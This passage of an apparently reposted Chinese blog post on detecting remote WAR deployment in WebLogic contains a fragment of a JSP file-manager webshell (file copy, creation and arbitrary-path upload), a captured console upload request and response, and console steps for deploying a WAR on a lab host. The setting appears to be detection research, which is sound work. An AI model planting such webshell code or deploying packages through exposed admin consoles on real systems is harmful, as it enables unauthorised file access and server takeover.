	sbCopy.append("目标文件: <input type=text name=file2 size=40 value='"+strDir+"'><p>");
	sbCopy.append("<input type=submit name=save value=' "+strFileCopy[languageNo]+" '> ");
	sbCopy.append("<input type=button name=goback value=' "+strBack[languageNo]+" ' onclick='history.back(-1);'> <p>&nbsp;rn");
	sbCopy.append("</form>");
}
if(strAction!=null && strAction.equals("savecopy"))
{
	File f=new File(strPath);
	String strDesFile=request.getParameter("file2");
	if(strDesFile==null || strDesFile.equals(""))
	{
		sbSaveCopy.append("<p><font color=red>目标文件错误。</font>");
	}
	else
	{
		File f_des=new File(strDesFile);
		if(f_des.isFile())
		{
			sbSaveCopy.append("<p><font color=red>目标文件已存在,不能复制。</font>");
		}
		else
		{
			String strTmpFile=strDesFile;
			if(f_des.isDirectory())
			{
				if(!strDesFile.endsWith("\"))
				{
					strDesFile=strDesFile+"\";
				}
				strTmpFile=strDesFile+"cqq_"+strFile;
			 }
			
			File f_des_copy=new File(strTmpFile);
			FileInputStream in1=new FileInputStream(f);
			FileOutputStream out1=new FileOutputStream(f_des_copy);
			byte[] buffer=new byte[1024];
			int c;
			while((c=in1.read(buffer))!=-1)
			{
				out1.write(buffer,0,c);
			}
			in1.close();
			out1.close();
	
			sbSaveCopy.append("原始文件 :"+strPath+"<p>");
			sbSaveCopy.append("目标文件 :"+strTmpFile+"<p>");
			sbSaveCopy.append("<font color=red>复制成功!</font>");			
		}		
	}	
	sbSaveCopy.append("<p><input type=button name=saveCopyBack onclick='history.back(-2);' value=返回>");
}
if(strAction!=null && strAction.equals("newFile"))
{
	String strF=request.getParameter("fileName");
	String strType1=request.getParameter("btnNewFile");
	String strType2=request.getParameter("btnNewDir");
	String strType="";
	if(strType1==null)
	{
		strType="Dir";
	}
	else if(strType2==null)
	{
		strType="File";
	}
	if(!strType.equals("") && !(strF==null || strF.equals("")))
	{		
			File f_new=new File(strF);			
			if(strType.equals("File") && !f_new.createNewFile())
				sbNewFile.append(strF+" 文件创建失败");
			if(strType.equals("Dir") && !f_new.mkdirs())
				sbNewFile.append(strF+" 目录创建失败");
	}
	else
	{
		sbNewFile.append("<p><font color=red>建立文件或目录出错。</font>");
	}
}

if((request.getContentType()!= null) && (request.getContentType().toLowerCase().startsWith("multipart")))
{
	String tempdir=".";
	boolean error=false;
	response.setContentType("text/html");
	sbNewFile.append("<p><font color=red>建立文件或目录出错。</font>");
	HttpMultiPartParser parser = new HttpMultiPartParser();

	int bstart = request.getContentType().lastIndexOf("oundary=");
	String bound = request.getContentType().substring(bstart + 8);
	int clength = request.getContentLength();
	Hashtable ht = parser.processData(request.getInputStream(), bound, tempdir, clength);
	if (ht.get("cqqUploadFile") != null)
	{

		FileInfo fi = (FileInfo) ht.get("cqqUploadFile");
		File f1 = fi.file;
		UplInfo info = UploadMonitor.getInfo(fi.clientFileName);
		if (info != null && info.aborted) 
		{
			f1.delete();
			request.setAttribute("error", "Upload aborted");
		}
		else 
		{
			String path = (String) ht.get("path");
			if(path!=null && !path.endsWith("\")) 
				path = path + "\";
			if (!f1.renameTo(new File(path + f1.getName()))) 
			{
				request.setAttribute("error", "Cannot upload file.");
				error = true;
				f1.delete();
			}
		}
	}
}
%>
-----------------------------8434166712903
Content-Disposition: form-data; name="AppApplicationInstallPortletuploadPlanPath"; filename=""
Content-Type: application/octet-stream


-----------------------------8434166712903
Content-Disposition: form-data; name="AppApplicationInstallPortletfrsc"

0x062430ecab863931868d682e81a64437e4490c23def60129
-----------------------------8434166712903--
HTTP/1.1 200 OK
Cache-Control: no-cache,no-store,max-age=0
Cache-Control: no-cache,no-store,max-age=0
Cache-Control: no-cache,no-store,max-age=0
Cache-Control: no-cache,no-store,max-age=0
Connection: close
Date: Mon, 22 Feb 2021 06:20:53 GMT
Pragma: No-cache
Pragma: No-cache
Pragma: No-cache
Pragma: No-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 37476

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta http-equiv="Content-Script-Type" content="text/javascript"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Install Application Assistant - base_domain - WLS Console</title><link rel="stylesheet" type="text/css" href="/console/framework/skeletons/wlsconsole/css/layout.css"><script src="/console/framework/skeletons/wlsconsole/js/buttons.js" type="text/javascript"></script><script src="/console/framework/skeletons/wlsconsole/js/util.js" type="text/javascript"></script><link rel="stylesheet" type="text/css" href="/console/framework/skins/wlsconsole/css/general.css"><link rel="stylesheet" type="text/css" href="/console/framework/skins/wlsconsole/css/menu.css"><link rel="stylesheet" type="text/css" href="/console/framework/skins/wlsconsole/css/window.css"><link rel="stylesheet" type="text/css" href="/console/framework/skins/wlsconsole/css/console.css"><link rel="stylesheet" type="text/css" href="/console/css/content.css"><script src="/console/javascript/consoleUtil.js" type="text/javascript"></script><script src="/console/javascript/console-help.js" type="text/javascript"></script><script src="/console/javascript/recorder.js" type="text/javascript"></script><link rel="stylesheet" type="text/css" href="/console/css/changemgmt.css"><link rel="stylesheet" type="text/css" href="/console/css/forms.css"><script src="/console/javascript/changemgmt.js" type="text/javascript"></script><script src="/console/javascript/form.js" type="text/javascript"></script><script src="/console/javascript/PredicateEditor.js" type="text/javascript"></script><script src="/console/javascript/table.js" type="text/javascript"></script><script src="/console/javascript/portletrefresh.js" type="text/javascript"></script><script src="/console/javascript/ButtonMenu.js" type="text/javascript"></script><script src="/console/javascript/chooser.js" type="text/javascript"></script><link rel="stylesheet" type="text/css" href="/console/css/navtree.css"><script src="/console/javascript/tree.js" type="text/javascript"></script><link rel="stylesheet" type="text/css" href="/console/css/quicklinks.css"><link rel="stylesheet" type="text/css" href="/console/css/systemstatus.css"></head><body><div class="wlsc-header"><div id="console-header-logo"><a href="#repetitive_links"><img src="images/spacer.gif" alt="Skip repetitive links "></a><div><a href="http://192.168.52.128:7001/console/console.portal?_nfpb=true&amp;_pageLabel=HomePage1" title="WebLogic Server Administration Console Home"><img src="framework/skins/wlsconsole/images/Branding_WeblogicConsole.gif" id="console-title" alt="WebLogic Server Administration Console Home "></a></div></div><div id="global-links"><span id="pageStatus"><img src="framework/skins/wlsconsole/images/pageIdle.gif" id="pageIdle" title="Idle" alt="Idle"><img src="framework/skins/wlsconsole/images/pageBusy.gif" id="pageBusy" title="Busy" alt="Busy"></span></div><div id="header-trans"><img src="framework/skins/wlsconsole/images/gradient-white-none.png" alt=""></div></div><div id="Home" class="wlsc-book"><div class="wlsc-book-content"><div id="page" class="wlsc-page"><div class="wlsc-2col-layout"><div id="console-content-col"><div id="console-content-col-inner"><div id="ToolbarBook" class="none"><div class="wlsc-book-content"><div id="ToolbarPage" class="wlsc-page"><div id="portlet_toolbar" class="wlsc-window  "><div class="wlsc-window-content">

后面基本就是一路Next,详细的操作参考:https://www.cnblogs.com/DFX339/p/8515200.html

部署完成

三种远程部署war包检测

开始配置系统环境

http://192.168.52.128:7001/console/console.portal?_nfpb=true&_pageLabel=CoreServerServerTablePage

三种远程部署war包检测

选择协议,然后选择HTTP

http://192.168.52.128:7001/console/console.portal?_nfpb=true&_pageLabel=ServerProtocolsTabhttpTabPage&handle=com.bea.console.handles.JMXHandle(“com.bea%3AName%3DAdminServer%2CType%3DServer&#8221;)

三种远程部署war包检测

再次点击部署(Deployments)

http://192.168.52.128:7001/console/console.portal?_nfpb=true&_pageLabel=AppDeploymentsControlPage

三种远程部署war包检测

然后就可以访问项目了 http://IP:PORT/ProjectName

http://192.168.52.128:7001/test3693/


程序员灯塔
转载请注明原文链接:三种远程部署war包检测
喜欢 (0)